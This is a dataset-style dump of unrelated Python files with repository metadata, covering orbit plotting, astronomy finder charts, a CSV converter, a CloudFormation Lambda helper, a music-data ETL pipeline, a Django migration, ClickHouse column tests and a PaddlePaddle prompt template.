toy_pot = pot.harmonic_oscillator(omega=pars[:3])
# Integrate initial condition in toy potential
timeseries_2=np.linspace(0.,2.*final_t,3500)
results_toy = odeint(pot.orbit_derivs2,initial,timeseries_2,args=(toy_pot,))
print "True actions: ", TT.action(results[0])
print "Found actions: ", act[:3]
print "True frequencies: ",TT.freq(results[0])
print "Found frequencies: ",ang[3:6]
# and plot
f,a = plt.subplots(2,3,figsize=[3.32,5.5])
a[0,0] = plt.subplot2grid((3,2), (0, 0))
a[1,0] = plt.subplot2grid((3,2), (0, 1))
a[0,1] = plt.subplot2grid((3,2), (1, 0))
a[1,1] = plt.subplot2grid((3,2), (1, 1))
a[0,2] = plt.subplot2grid((3,2), (2, 0),colspan=2)
plt.subplots_adjust(wspace=0.5,hspace=0.45)
# xy orbit
a[0,0].plot(results.T[0],results.T[1],'k')
a[0,0].set_xlabel(r'$x/{\rm kpc}$')
a[0,0].set_ylabel(r'$y/{\rm kpc}$')
a[0,0].xaxis.set_major_locator(MaxNLocator(5))
# xz orbit
a[1,0].plot(results.T[0],results.T[2],'k')
a[1,0].set_xlabel(r'$x/{\rm kpc}$')
a[1,0].set_ylabel(r'$z/{\rm kpc}$')
a[1,0].xaxis.set_major_locator(MaxNLocator(5))
# toy orbits
a[0,0].plot(results_toy.T[0],results_toy.T[1],'r',alpha=0.2,linewidth=0.3)
a[1,0].plot(results_toy.T[0],results_toy.T[2],'r',alpha=0.2,linewidth=0.3)
# Toy actions
a[0,2].plot(Conv*timeseries,toy_aa.T[0],'k:',label='Toy action')
a[0,2].plot(Conv*timeseries,toy_aa.T[1],'r:')
a[0,2].plot(Conv*timeseries,toy_aa.T[2],'b:')
# Arrows to show approx. actions
arrow_end = a[0,2].get_xlim()[1]
arrowd = 0.08*(arrow_end-a[0,2].get_xlim()[0])
a[0,2].annotate('',(arrow_end+arrowd,act[0]),(arrow_end,act[0]),arrowprops=dict(arrowstyle='<-',color='k'),annotation_clip=False)
a[0,2].annotate('',(arrow_end+arrowd,act[1]),(arrow_end,act[1]),arrowprops=dict(arrowstyle='<-',color='r'),annotation_clip=False)
a[0,2].annotate('',(arrow_end+arrowd,act[2]),(arrow_end,act[2]),arrowprops=dict(arrowstyle='<-',color='b'),annotation_clip=False)
# True actions
a[0,2].plot(Conv*timeseries,TT.action(results[0])[0]*np.ones(len(timeseries)),'k',label='True action')
a[0,2].plot(Conv*timeseries,TT.action(results[0])[1]*np.ones(len(timeseries)),'k')
a[0,2].plot(Conv*timeseries,TT.action(results[0])[2]*np.ones(len(timeseries)),'k')
a[0,2].set_xlabel(r'$t/{\rm Gyr}$')
a[0,2].set_ylabel(r'$J/{\rm kpc\,km\,s}^{-1}$')
leg = a[0,2].legend(loc='upper center',bbox_to_anchor=(0.5,1.2),ncol=3, numpoints = 1)
leg.draw_frame(False)
# Toy angle coverage
a[0,1].plot(toy_aa.T[3]/(np.pi),toy_aa.T[4]/(np.pi),'k.',markersize=0.4)
a[0,1].set_xlabel(r'$\theta_1/\pi$')
a[0,1].set_ylabel(r'$\theta_2/\pi$')
a[1,1].plot(toy_aa.T[3]/(np.pi),toy_aa.T[5]/(np.pi),'k.',markersize=0.4)
a[1,1].set_xlabel(r'$\theta_1/\pi$')
a[1,1].set_ylabel(r'$\theta_3/\pi$')
plt.savefig(file_output,bbox_inches='tight')
return act
if __name__=="__main__":
BoxP = np.array([0.1,0.1,0.1,142.,140.,251.])
LoopP = np.array([10.,1.,8.,40.,152.,63.])
ResP = np.array([0.1,0.1,0.1,142.,150.,216.5])
LongP = np.array([-0.5,18.,0.5,25.,20.,-133.1])
# Short-axis Loop
LowestPeriodLoop = 2*np.pi/15.30362865
# Fig 1
loop = plot3D_stacktriax(LoopP,8*LowestPeriodLoop,6,'genfunc_3d_example_LT_Stack_Loop.pdf')
# Fig 3
vs.Sn_plots('GF.Sn_loop','loop',loop,1)
# Box
LowestPeriodBox = 2.*np.pi/38.86564386
# Fig 2
box = plot3D_stacktriax(BoxP,8*LowestPeriodBox,6,'genfunc_3d_example_LT_Stack_Box.pdf')
# Fig 4
vs.Sn_plots('GF.Sn_box','box',box,0)
# Res
LowestPeriodRes = 2.*np.pi/42.182
# Fig 5
res = plot3D_stacktriax(ResP,8*LowestPeriodBox,6,'genfunc_3d_example_LT_Stack_Res.pdf')
# vs.Sn_plots('GF.Sn_box','box',res,0)
# Long-axis loop
LowestPeriodLong = 2.*np.pi/12.3
| 37.964539 | 229 | 0.600598 | 2,761 | 16,059 | 3.403839 | 0.147773 | 0.006384 | 0.010853 | 0.008619 | 0.482762 | 0.413918 | 0.367419 | 0.327942 | 0.29219 | 0.252713 | 0 | 0.051735 | 0.2068 | 16,059 | 422 | 230 | 38.054502 | 0.686057 | 0.069307 | 0 | 0.262172 | 0 | 0 | 0.094604 | 0.013707 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.044944 | null | null | 0.123596 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa3c53fd6d46ee624b7f8501fe8550742fc44be3 | 1,083 | py | Python | craftroom/thefriendlystars/panels.py | davidjwilson/craftroom | 05721893350a8b554204e188c8413ee33a7768ad | [
"MIT"
] | 1 | 2019-11-25T21:19:03.000Z | 2019-11-25T21:19:03.000Z | craftroom/thefriendlystars/panels.py | davidjwilson/craftroom | 05721893350a8b554204e188c8413ee33a7768ad | [
"MIT"
] | 1 | 2018-03-14T04:26:54.000Z | 2018-03-14T04:26:54.000Z | craftroom/thefriendlystars/panels.py | davidjwilson/craftroom | 05721893350a8b554204e188c8413ee33a7768ad | [
"MIT"
] | 1 | 2021-09-10T21:24:43.000Z | 2021-09-10T21:24:43.000Z |
'''
Panel object contains
up to one image in the background,
and any number of catalogs plotted.
'''
import astroquery.skyview
class Panel:
'''
A single frame of a finder chart,
that has up to one image in the background,
and any number of catalogs plotted.
'''
def __init__(self, image, catalogs=None):
pass
#???
# define the images that accessible to skyview
twomass = ['2MASS-J', '2MASS-H', '2MASS-K']
ukidss = ['UKIDSS-Y', 'UKIDSS-J', 'UKIDSS-H', 'UKIDSS-K']
wise = ['WISE 3.4', 'WISE 4.6', 'WISE 12', 'WISE 22']
dss1 = ['DSS1 Blue', 'DSS1 Red']
dss2 = ['DSS2 Blue', 'DSS2 Red']
GALEX = ['GALEX Far UV', 'GALEX Near UV']
class Image:
'''
This represents images that lines up with a given patch of the sky.
'''
def __init__(self, hdu, name=None):
'''
Initialize an image.
Parameters
----------
hdu : a PrimaryHDU file
FITS file
'''
self.header = hdu.header
self.data = hdu.data
self.wcs = WCS(hdu.header)
self.name = name
| 22.102041 | 71 | 0.581717 | 148 | 1,083 | 4.202703 | 0.5 | 0.012862 | 0.022508 | 0.038585 | 0.180064 | 0.180064 | 0.180064 | 0.180064 | 0.180064 | 0.180064 | 0 | 0.021879 | 0.282548 | 1,083 | 48 | 72 | 22.5625 | 0.778636 | 0.374885 | 0 | 0 | 0 | 0 | 0.247387 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.125 | false | 0.0625 | 0.0625 | 0 | 0.3125 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
aa423bbb57ccb85157fec0324522a113dca2abda | 501 | py | Python | Data/CSV_naar_hashtable.py | Tomaat/Programmeerproject | f3fa7558891add6c46948afe778e1abf1cc0f565 | [
"MIT"
] | null | null | null | Data/CSV_naar_hashtable.py | Tomaat/Programmeerproject | f3fa7558891add6c46948afe778e1abf1cc0f565 | [
"MIT"
] | 1 | 2017-01-12T18:31:00.000Z | 2017-01-12T18:31:00.000Z | Data/CSV_naar_hashtable.py | Tomaat/Programmeerproject | f3fa7558891add6c46948afe778e1abf1cc0f565 | [
"MIT"
] | null | null | null | import csv
import json
from collections import defaultdict
f = open('DOOSTROOM_new.csv', 'rU')
h = defaultdict(lambda: defaultdict(lambda: defaultdict(int)))
for line in f:
line_list = line.split(";")
h[line_list[7]]["oorsprong"][line_list[3]] += int(line_list[12])
h[line_list[7]]["profiel"][line_list[6]] += int(line_list[12])
# Parse the CSV into JSON
out = json.dumps(h)
print "JSON parsed!"
# Save the JSON
f = open('data2015.json', 'w')
f.write(out)
print "JSON saved!" | 22.772727 | 65 | 0.670659 | 79 | 501 | 4.151899 | 0.468354 | 0.170732 | 0.170732 | 0.060976 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.028436 | 0.157685 | 501 | 22 | 66 | 22.772727 | 0.748815 | 0.077844 | 0 | 0 | 0 | 0 | 0.159389 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.214286 | null | null | 0.142857 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa45f0ddc8356bc41cfa28538ab685525dfeff79 | 2,138 | py | Python | python/version_creator.py | geoff-possum/lambda-versioning | 18f35945579cd9c1315c697444fc0d47aa66ea61 | [
"MIT"
] | 2 | 2020-12-07T05:18:56.000Z | 2021-04-03T08:13:58.000Z | python/version_creator.py | geoff-possum/lambda-versioning | 18f35945579cd9c1315c697444fc0d47aa66ea61 | [
"MIT"
] | null | null | null | python/version_creator.py | geoff-possum/lambda-versioning | 18f35945579cd9c1315c697444fc0d47aa66ea61 | [
"MIT"
] | null | null | null | import boto3
from botocore.vendored import requests
import json
from uuid import uuid4
def send(event, context, response_status, Reason=None, ResponseData=None, PhysicalResourceId=None):
response_url = event.get('ResponseURL', "")
json_body = json.dumps({
'Status' : response_status,
'Reason' : Reason or 'See the details in CloudWatch Log Stream: ' + context.log_stream_name,
'PhysicalResourceId' : PhysicalResourceId or context.log_stream_name,
'StackId' : event.get('StackId', ""),
'RequestId' : event.get('RequestId', ""),
'LogicalResourceId' : event.get('LogicalResourceId', ""),
'NoEcho' : True,
'Data' : ResponseData})
headers = {
'content-type' : '',
'content-length' : str(len(json_body))
}
try:
print json_body
response = requests.put(response_url,data=json_body,headers=headers)
print("Status code: " + response.reason)
except Exception as e:
print("Failed to send response to CFN: error executing requests.put: " + str(e))
def new_version(lambda_arn, text):
try:
client = boto3.client('lambda')
return (
True,
{ "VersionArn": "{}:{}".format(lambda_arn, client.publish_version(FunctionName=lambda_arn)["Version"]) },
"{} Successful".format(text)
)
except Exception as e:
print e
return (False, "", "Error during {}: {}".format(text, e))
def lambda_handler(event, context):
print event
properties = event.get('ResourceProperties', {})
arn = properties.get('LambdaFunctionArn', "")
physical_resource_id = str(uuid4())
data = {}
req_type = event.get('RequestType', "")
if req_type == 'Create':
res, data, reason = new_version(arn, "Create")
elif req_type == 'Update':
res, data, reason = new_version(arn, "Update")
elif req_type == 'Delete':
physical_resource_id = properties.get('PhysicalResourceId', '')
res = True
reason = "Delete Successful"
else:
res = False
reason = "Unknown operation: " + req_type
status = "FAILED"
if res:
status = "SUCCESS"
send(event, context, status, Reason=reason, ResponseData=data, PhysicalResourceId=physical_resource_id)
| 34.483871 | 112 | 0.673994 | 248 | 2,138 | 5.685484 | 0.366935 | 0.034043 | 0.038298 | 0.028369 | 0.069504 | 0.036879 | 0 | 0 | 0 | 0 | 0 | 0.002292 | 0.183817 | 2,138 | 62 | 113 | 34.483871 | 0.805731 | 0 | 0 | 0.068966 | 0 | 0 | 0.216456 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | null | 0 | 0.068966 | null | null | 0.086207 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
aa46d1dd10569615cec8459fd895776c5d59f9d9 | 6,459 | py | Python | musicdwh/musicdwh.py | dagmar-urbancova/musicdwh | d9960820e7bb77cbe20713b2a344e1fdf86be92a | [
"MIT"
] | null | null | null | musicdwh/musicdwh.py | dagmar-urbancova/musicdwh | d9960820e7bb77cbe20713b2a344e1fdf86be92a | [
"MIT"
] | null | null | null | musicdwh/musicdwh.py | dagmar-urbancova/musicdwh | d9960820e7bb77cbe20713b2a344e1fdf86be92a | [
"MIT"
] | null | null | null | """Main module."""
import os
import sys
import time
from datetime import datetime
import pandas as pd
import ipapi
import sqlalchemy as sqla
try:
DATA_DATE = os.environ['DATA_DATE']
print('Using data from {}'.format(DATA_DATE))
except:
print('Envvar DATA_DATE not set.')
sys.exit(1)
try:
POSTGRES_PASSWORD = os.environ['POSTGRES_PASSWORD']
print('Using password from POSTGRES_PASSWORD')
except:
print('Envvar POSTGRES_PASSWORD not set.')
sys.exit(1)
try:
POSTGRES_USER = os.environ['POSTGRES_USER']
print('Using password from POSTGRES_USER')
except:
print('Envvar POSTGRES_USER not set.')
sys.exit(1)
try:
POSTGRES_DB = os.environ['POSTGRES_DB']
print('Using password from POSTGRES_DB')
except:
print('Envvar POSTGRES_DB not set.')
sys.exit(1)
# define database connection
db_name = POSTGRES_DB
db_user = POSTGRES_USER
db_pass = POSTGRES_PASSWORD
db_host = 'database'
db_port = '5432'
DB_CONNECTION = 'postgresql://{}:{}@{}:{}/{}'.format(
db_user, db_pass, db_host, db_port, db_name
)
# define constants
DATA_PATH = './data'
DB_LAYER_0 = 'layer0'
DB_LAYER_1 = 'layer1'
RETRY_COUNT = 5
DELAY_TIME = 5
def import_hb(file_path):
# import csv file - hb
# import data to DataFrame
print('Reading hb data from {}'.format(file_path))
try:
data_hb2 = pd.read_csv(file_path)
return(data_hb2)
except:
print('hb data not accessible')
def import_wwc(file_path):
# import json file - wwc
# import data to DataFrame
print('Reading wwc data from {}'.format(file_path))
try:
data_wwc_i = pd.read_json(file_path, lines=True)
# split data into dataframe columns
dfs = []
for c in data_wwc_i:
tmp = pd.DataFrame(list(data_wwc_i[c]))
tmp.columns = [c + '_%s' % str(i+1) for i in range(tmp.shape[1])]
dfs.append(tmp)
data_wwc = pd.concat(dfs, 1)
return(data_wwc)
except:
print('wwc data not accessible')
def import_lov(file_path):
# import csv file - LOV
# import data to DataFrame
print('Reading LOV data from {}'.format(file_path))
try:
data = pd.read_csv(file_path)
return(data)
except:
print('data not accessible')
def ip_convert_country (
ip_address_series,
batch,
sleep_time = 60):
# get country code from IP address, ipapi limit - 1,000 requests daily , 45/minute
# using IP-API
# series to list
size_counter = 0
country_code = ''
ip_list = ip_address_series.to_list()
code_list = []
# for each element in list get IP
for address in ip_list:
# if we reached free limit of 45 items per minute, sleep
if size_counter >= batch:
size_counter = 0
#print('Sleeping')
time.sleep(sleep_time)
else:
pass
try:
country_code = ipapi.location(address, output='country_code')
except:
country_code = 'NaN'
code_list.append(country_code)
size_counter += 1
code_series = pd.Series(code_list)
return(code_series)
def import_game (
game_id,
export_date,
data_path
):
try:
export_date_d=datetime.strptime(export_date,'%Y-%m-%d')
except:
print('DATA_DATE is not in the right format. Please set in format YYYY-MM-DD.')
sys.exit(1)
date_y = export_date_d.strftime("%Y")
date_m = export_date_d.strftime("%m")
date_d = export_date_d.strftime("%d")
#data_path = '/musicdwh/musicdwh/data/'
wwc_path = '/wwc/{}/{}/{}/wwc.json'.format(date_y, date_m, date_d)
hb_path = '/hb/{}/{}/{}/hb.csv'.format(date_y, date_m, date_d)
# expecting date in format 'YYYY-MM-DD'
if game_id == 'wwc':
imported_data = import_wwc(data_path + wwc_path)
print('import wwc from: ' + data_path + wwc_path)
elif game_id == 'hb':
imported_data = import_hb(data_path + hb_path)
print('import hb from: ' + data_path + hb_path)
else:
print ('Please choose a game to import: wwc / hb')
return(imported_data)
def connect_to_db(db_con, retry_count, delay):
print('Connecting to {}'.format(db_con))
engine = sqla.create_engine(db_con, isolation_level="AUTOCOMMIT")
return engine
def upload_to_db(
df,
db_table,
engine,
db_schema
):
sql = sqla.text("TRUNCATE TABLE {}.{}".format(db_schema, db_table))
try:
engine.execute(sql)
except:
print("{}.{} - Table does not exist.".format(db_schema, db_table))
df.to_sql(db_table, engine, schema=db_schema, if_exists='append')
# main script
if __name__ == '__main__':
print("================================= starting load =================================")
# create database connection
engine = connect_to_db(DB_CONNECTION, RETRY_COUNT, DELAY_TIME)
# populate LOVs
LOV_PATH = '{}/LOVs'.format(DATA_PATH)
#LOV_gender
gender_df = import_lov('{}/LOV_gender.csv'.format(LOV_PATH))
upload_to_db (gender_df, 'lov_gender', engine, DB_LAYER_0)
#LOV_title
title_df = import_lov('{}/LOV_title.csv'.format(LOV_PATH))
upload_to_db (title_df, 'lov_title', engine, DB_LAYER_0)
# load wwc data
data_wwc = import_game ('wwc', DATA_DATE, DATA_PATH)
# load hb data
data_hb = import_game ('hb', DATA_DATE, DATA_PATH)
# get country codes from IP address
ip_code_series = ip_convert_country(data_hb['ip_address'], 30, 100)
# append country code to hb dataframe
data_hb['country_code']=ip_code_series
# upload daily data to database, schema L0
upload_to_db (data_hb, 'import_data_hb', engine, DB_LAYER_0)
upload_to_db (data_wwc, 'import_data_wwc', engine, DB_LAYER_0)
# run load to Layer1
with open('./sql_scripts/04_L0_L1_load.sql', 'r') as sql_file:
script_string = sql_file.read()
print('Running insert script L0_L1_load')
db_script = engine.execute(script_string)
# run updates on existing records
with open('./sql_scripts/05_L0_L1_update.sql', 'r') as sql_file:
script_string = sql_file.read()
print('Running update script L0_L1_update')
db_script = engine.execute(script_string)
| 29.226244 | 94 | 0.62471 | 894 | 6,459 | 4.244966 | 0.203579 | 0.02108 | 0.01054 | 0.013702 | 0.222134 | 0.150461 | 0.106983 | 0.025296 | 0.025296 | 0.025296 | 0 | 0.011633 | 0.254683 | 6,459 | 220 | 95 | 29.359091 | 0.776693 | 0.121071 | 0 | 0.225806 | 0 | 0 | 0.19727 | 0.031726 | 0 | 0 | 0 | 0 | 0 | 1 | 0.045161 | false | 0.051613 | 0.148387 | 0 | 0.2 | 0.148387 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 1 |
aa471620e45f82f8795929b2bd7008f06f5d5d0e | 653 | py | Python | biserici_inlemnite/biserici/migrations/0033_auto_20210803_1623.py | ck-tm/biserici-inlemnite | c9d12127b92f25d3ab2fcc7b4c386419fe308a4e | [
"MIT"
] | null | null | null | biserici_inlemnite/biserici/migrations/0033_auto_20210803_1623.py | ck-tm/biserici-inlemnite | c9d12127b92f25d3ab2fcc7b4c386419fe308a4e | [
"MIT"
] | null | null | null | biserici_inlemnite/biserici/migrations/0033_auto_20210803_1623.py | ck-tm/biserici-inlemnite | c9d12127b92f25d3ab2fcc7b4c386419fe308a4e | [
"MIT"
] | null | null | null | # Generated by Django 3.1.13 on 2021-08-03 13:23
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('biserici', '0032_auto_20210803_1622'),
]
operations = [
migrations.AddField(
model_name='descriere',
name='solee_detalii',
field=models.TextField(blank=True, null=True, verbose_name='Solee (observații)'),
),
migrations.AddField(
model_name='historicaldescriere',
name='solee_detalii',
field=models.TextField(blank=True, null=True, verbose_name='Solee (observații)'),
),
]
| 27.208333 | 93 | 0.614089 | 67 | 653 | 5.850746 | 0.58209 | 0.091837 | 0.117347 | 0.137755 | 0.403061 | 0.403061 | 0.403061 | 0.403061 | 0.403061 | 0.403061 | 0 | 0.066806 | 0.266462 | 653 | 23 | 94 | 28.391304 | 0.751566 | 0.070444 | 0 | 0.470588 | 1 | 0 | 0.2 | 0.038017 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.058824 | 0 | 0.235294 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4af9051ce0c393008d96458e2c2f3dce09ae68a | 3,514 | py | Python | tests/clickhouse/test_columns.py | fpacifici/snuba | cf732b71383c948f9387fbe64e9404ca71f8e9c5 | [
"Apache-2.0"
] | null | null | null | tests/clickhouse/test_columns.py | fpacifici/snuba | cf732b71383c948f9387fbe64e9404ca71f8e9c5 | [
"Apache-2.0"
] | null | null | null | tests/clickhouse/test_columns.py | fpacifici/snuba | cf732b71383c948f9387fbe64e9404ca71f8e9c5 | [
"Apache-2.0"
] | null | null | null | from copy import deepcopy
import pytest
from snuba.clickhouse.columns import (
UUID,
AggregateFunction,
Array,
ColumnType,
Date,
DateTime,
Enum,
FixedString,
Float,
IPv4,
IPv6,
Nested,
ReadOnly,
)
from snuba.clickhouse.columns import SchemaModifiers as Modifier
from snuba.clickhouse.columns import String, UInt
TEST_CASES = [
pytest.param(
String(Modifier(nullable=True)),
String(),
String(),
"Nullable(String)",
id="strings",
),
pytest.param(
UUID(Modifier(readonly=True)),
UUID(),
UUID(Modifier(nullable=True)),
"UUID",
id="UUIDs",
),
pytest.param(IPv4(None), IPv4(), IPv4(Modifier(nullable=True)), "IPv4", id="IPs",),
pytest.param(IPv6(None), IPv6(), IPv6(Modifier(nullable=True)), "IPv6", id="IPs",),
pytest.param(
FixedString(32, Modifier(nullable=True)),
FixedString(32),
FixedString(64, Modifier(nullable=True)),
"Nullable(FixedString(32))",
id="fixed strings",
),
pytest.param(
UInt(8, Modifier(nullable=True)),
UInt(8),
UInt(16, Modifier(nullable=True)),
"Nullable(UInt8)",
id="integers",
),
pytest.param(
Float(64, Modifier(nullable=True)),
Float(64),
Float(32, Modifier(nullable=True)),
"Nullable(Float64)",
id="floats",
),
pytest.param(Date(), Date(), Date(Modifier(nullable=True)), "Date", id="dates",),
pytest.param(
DateTime(),
DateTime(),
DateTime(Modifier(nullable=True)),
"DateTime",
id="datetimes",
),
pytest.param(
Array(String(Modifier(nullable=True))),
Array(String()),
Array(String()),
"Array(Nullable(String))",
id="arrays",
),
pytest.param(
Nested(
[("key", String()), ("val", String(Modifier(nullable=True)))],
Modifier(nullable=True),
),
Nested([("key", String()), ("val", String())]),
Nested([("key", String()), ("val", String())], Modifier(nullable=True)),
"Nullable(Nested(key String, val Nullable(String)))",
id="nested",
),
pytest.param(
AggregateFunction("uniqIf", [UInt(8), UInt(32)], Modifier(nullable=True)),
AggregateFunction("uniqIf", [UInt(8), UInt(32)]),
AggregateFunction("uniqIf", [UInt(8)], Modifier(nullable=True)),
"Nullable(AggregateFunction(uniqIf, UInt8, UInt32))",
id="aggregated",
),
pytest.param(
Enum([("a", 1), ("b", 2)], Modifier(nullable=True)),
Enum([("a", 1), ("b", 2)]),
Enum([("a", 1), ("b", 2)]),
"Nullable(Enum('a' = 1, 'b' = 2))",
id="enums",
),
]
@pytest.mark.parametrize("col_type, raw_type, different_type, for_schema", TEST_CASES)
def test_methods(
col_type: ColumnType,
raw_type: ColumnType,
different_type: ColumnType,
for_schema: str,
) -> None:
assert col_type == deepcopy(col_type)
assert col_type != different_type
# Test it is not equal to a type of different class.
assert col_type != ColumnType(Modifier(readonly=True))
assert col_type.for_schema() == for_schema
assert col_type.get_raw() == raw_type
modified = col_type.set_modifiers(col_type.get_modifiers())
assert modified is not col_type
assert modified == col_type
assert col_type.set_modifiers(Modifier(readonly=True)).has_modifier(ReadOnly)
| 28.803279 | 87 | 0.584804 | 381 | 3,514 | 5.312336 | 0.215223 | 0.150198 | 0.187747 | 0.06917 | 0.19664 | 0.077075 | 0.043478 | 0.043478 | 0 | 0 | 0 | 0.018561 | 0.248719 | 3,514 | 121 | 88 | 29.041322 | 0.748106 | 0.014229 | 0 | 0.256637 | 0 | 0 | 0.12305 | 0.023686 | 0 | 0 | 0 | 0 | 0.070796 | 1 | 0.00885 | false | 0 | 0.044248 | 0 | 0.053097 | 0 | 0 | 0 | 0 | null | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 |
a4b1c460b6c065a467161df65796be109740e64e | 5,851 | py | Python | src/paddle_prompt/templates/base_template.py | wj-Mcat/paddle-prompt | 3cc47c7cbda946fb9bc6e3032e8de17571e03cd4 | [
"Apache-2.0"
] | 1 | 2022-03-09T05:31:50.000Z | 2022-03-09T05:31:50.000Z | src/paddle_prompt/templates/base_template.py | wj-Mcat/paddle-prompt | 3cc47c7cbda946fb9bc6e3032e8de17571e03cd4 | [
"Apache-2.0"
] | null | null | null | src/paddle_prompt/templates/base_template.py | wj-Mcat/paddle-prompt | 3cc47c7cbda946fb9bc6e3032e8de17571e03cd4 | [
"Apache-2.0"
] | null | null | null | """Base Abstract Template class"""
from __future__ import annotations
import json
from abc import ABC
from collections import OrderedDict
from typing import Any, Dict, List
import numpy as np
import paddle
from paddle import nn
from paddlenlp.transformers.tokenizer_utils import PretrainedTokenizer
from paddle_prompt.config import Config
from paddle_prompt.schema import InputExample, InputFeature
from paddle_prompt.templates.engine import JinjaEngine
from paddle_prompt.utils import extract_and_stack_by_fields, lists_to_tensors
def _resize_prediction_mask(text: str, label_size: int) -> str:
mask_str = '[MASK]'
return text.replace(mask_str, ''.join([mask_str] * label_size))
def _load_label2words(file: str) -> Dict[str, List[str]]:
label2words = OrderedDict()
with open(file, 'r', encoding='utf-8') as f:
data = json.load(f)
for label, label_obj in data.items():
label2words[label] = label_obj['labels']
return label2words
class SoftMixin:
"""Soft Template Mixin object which can handle the soft token"""
def soft_token_ids(self) -> List[int]:
"""
This function identifies which tokens are soft tokens.
Sometimes tokens in the template are not from the vocabulary,
but a sequence of soft tokens.
In this case, you need to implement this function
"""
raise NotImplementedError
class Template(nn.Layer):
"""
abstract class for templates in prompt
TODO: how to handle -> fill the target label in the mask place
"""
def __init__(
self,
tokenizer: PretrainedTokenizer,
config: Config,
**kwargs
):
super().__init__(**kwargs)
self.render_engine = JinjaEngine.from_file(config.template_file)
self.tokenizer: PretrainedTokenizer = tokenizer
self.config: Config = config
self.label2words: Dict[str, List[str]] = _load_label2words(
config.template_file
)
self._init_max_token_num()
def _init_max_token_num(self):
max_token_num = 0
for words in self.label2words.values():
for word in words:
max_token_num = max(max_token_num, len(word))
self.config.max_token_num = max_token_num
def _get_mask_id(self) -> int:
# TODO: to be removed, this code is to fix the issue of paddlenlp
special_tokens = [token for token in self.tokenizer.all_special_tokens if token != self.config.mask_token]
special_ids: List[int] = self.tokenizer.convert_tokens_to_ids(special_tokens)
ids = self.tokenizer.convert_tokens_to_ids([self.config.mask_token])
ids = [id for id in ids if id not in special_ids]
assert len(ids) == 1, 'can"t get [MASK] id from tokenizer'
return ids[0]
def wrap_examples(
self,
examples: List[InputExample],
label2idx: Dict[str, int] = None
):
"""wrap examples with template and convert them to features
which can be feed into MLM
Args:
examples (List[InputExample]): the examples object
label2idx (Dict[str, int], optional): label to index mapper.
Defaults to None.
Returns:
List[Tensor]: the features which will be feed into MLM
"""
if not label2idx:
label2idx = self.config.label2idx
# 1. construct text or text pair dataset
texts = [self.render_engine.render(example) for example in examples]
texts = [_resize_prediction_mask(
text, self.config.max_token_num) for text in texts]
encoded_features = self.tokenizer.batch_encode(
texts,
max_seq_len=self.config.max_seq_length,
pad_to_max_seq_len=True,
return_token_type_ids=True,
)
fields = ['input_ids', 'token_type_ids']
# 2. return different data based on label
has_label = examples[0].label is not None
if not has_label:
return extract_and_stack_by_fields(encoded_features, fields)
label_ids = []
is_multi_class = isinstance(examples[0].label, list)
if not is_multi_class:
label_ids = [label2idx[example.label] for example in examples]
else:
for example in examples:
example_label_ids = [label2idx[label]
for label in example.label]
label_ids.append(example_label_ids)
features = extract_and_stack_by_fields(encoded_features, fields)
# 3. construct prediction mask
mask_token_id = self._get_mask_id()
mask_label_mask = np.array(features[0]) == mask_token_id
np_prediction_mask = np.argwhere(mask_label_mask)
prediction_mask = []
for pre_mask in np_prediction_mask:
prediction_mask.append(
pre_mask[0] * self.config.max_seq_length + pre_mask[1])
features.append(np.array(prediction_mask))
# 4. construct mask_label_ids
mask_label_ids = []
for example in examples:
mask_label_ids.extend(
self.tokenizer.convert_tokens_to_ids(
# TODO: to handle the multiple words?
list(self.label2words[example.label][0])
)
)
features.append(np.array(mask_label_ids))
# 4. add label ids data
features.append(
np.array(label_ids)
)
features = lists_to_tensors(features, self.config.place())
return features
def forward(self, *args, **kwargs) -> Any:
"""should handle the template mainforce logit
Returns:
Any: any result. TODO: define the forward result data structure.
"""
